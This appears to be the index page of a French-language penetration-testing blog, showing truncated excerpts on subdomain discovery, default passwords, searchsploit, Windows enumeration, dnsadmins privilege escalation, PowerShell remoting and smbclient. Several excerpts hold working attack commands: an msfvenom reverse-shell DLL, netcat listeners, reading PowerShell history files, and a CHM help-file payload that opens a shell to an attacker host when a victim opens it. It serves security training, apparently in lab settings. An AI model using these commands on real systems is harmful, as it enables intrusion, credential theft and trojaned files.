Découvrir les sous-domaines

Sur Google: site:mytarget.com -www On peut essayer avec inurl:adm , inurl:dev, inurl:admin pentest-tools.com spyce.com crt.sh (%.tesla.com) Autres outils Subfinder Amass Sublister Aquatone Knockpy Findomain censys.io shodan.io Google certificate transparency Facebook certificate transparency CSP header viewdns.info dnsdumpster.com virustotal.com Est-t’il possible de s’emparer d’un sous-domaine (domain takeover)? https://github.com/EdOverflow/can-i-take-over-xyz Taper le fingerprint retrouvé ainsi que le nom de … Continuer la lecture

Mots de passe par défaut d’applications

https://github.com/ihebski/DefaultCreds-cheat-sheet http://www.phenoelit.org/dpl/dpl.html http://www.vulnerabilityassessment.co.uk/passwordsC.htm https://192-168-1-1ip.mobi/default-router-passwords-list/ https://datarecovery.com/rd/default-passwords/ https://bizuns.com/default-passwords-list https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/default-passwords.csv https://www.cirt.net/passwords http://www.passwordsdatabase.com/

Liens et applications pour trouver des exploits

Recherche d’exploits sur exploitdb à partir de la console searchsploit "linux Kernel" #Exemple searchsploit apache mod_ssl #Un 2e exemple searchsploit -m 47080 #Copier l'exploit dans le répertoire courant searchsploit -p 47080[.c] #Affiche le chemin complet de l'exploit searchsploit -x 47080[.c] #Ouvre vi pour éditer l'exploit searchsploit –nmap resultats.xml #Search vulns inside an nmap xml result … Continuer la lecture

Quelques commandes Windows pratiques pour l’énumération

Vous pouvez énumérer tout ce qui se trouve ici avec le logiciel WinPEAS, mais voici une idée de ce que l’on peut trouver d’intéressant avec ce logiciel. Variables d’environnement set dir env: Get-ChildItem Env: | ft Key,Value Historiques de commandes powershell ConsoleHost_history #Find the PATH where is saved type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt type C:\Users\germa\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt cat … Continuer la lecture

Exploiter le compte d’un utilisateur faisant partie du groupe dnsadmins pour devenir administrateur

Si un utilisateur fait partie du groupe dnsadmins sur un DC, nous pouvons obtenir le compte administrateur de cette façon: msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.11 LPORT=8888 -f dll > germain.dll nc -nlvp 8888 Vous pourriez tester la dll en la copiant sur le serveur Windows et en exécutant pour avoir un shell : rundll32.exe .\germain.dll,DnsPluginInitialize #DnsPluginInitialize … Continuer la lecture

Installer powershell sur linux et se connecter sur Windows

Si Evil-WinRm ne fonctionne pas car le port 5985 n’est pas ouvert : nous pouvons utiliser Powershell pour Linux pour se connecter. sudo apt install gss-ntlmssp sudo apt-get install powershell nc -nvlp 9001 pwsh $offsec_session = New-PSSession -ComputerName 10.10.10.210 -Authentication Negotiate -Credential germain Enter-PSSession $offsec_session PS> &{ cd ../Desktop } PS> &{ ls } PS> … Continuer la lecture

Utilitaire smbclient

Souvent, le service SMB (Service Message Block) est disponible via le port TCP 445 lors d’une analyse. SMB est utilisé pour le partage de fichiers que ce soit sur Windows et Linux. Malheureusement, ce service possède plusieurs vulnérabilités connus. L’erreur la plus fréquente est un erreur de configuration qui permet à n’importe qui sans se … Continuer la lecture

Mettre un shell dans un fichier d’aide CHM

D’abord, il faut installer le HTML Help Workshop et télécharger le code powershell : https://github.com/samratashok/nishang/blob/master/Client/Out-CHM.ps1 import-module .\out.chm.ps1;out-chm -Payload "C:\tmp\nc.exe -e powershell 10.10.10.10 4444" -HHCPath "C:\Program Files (x86)\HTML Help Workshop" nc -nlvp 4444 #sur l'attaquant quand quelqu’un ouvrira le fichier d’aide, nous aurons un shell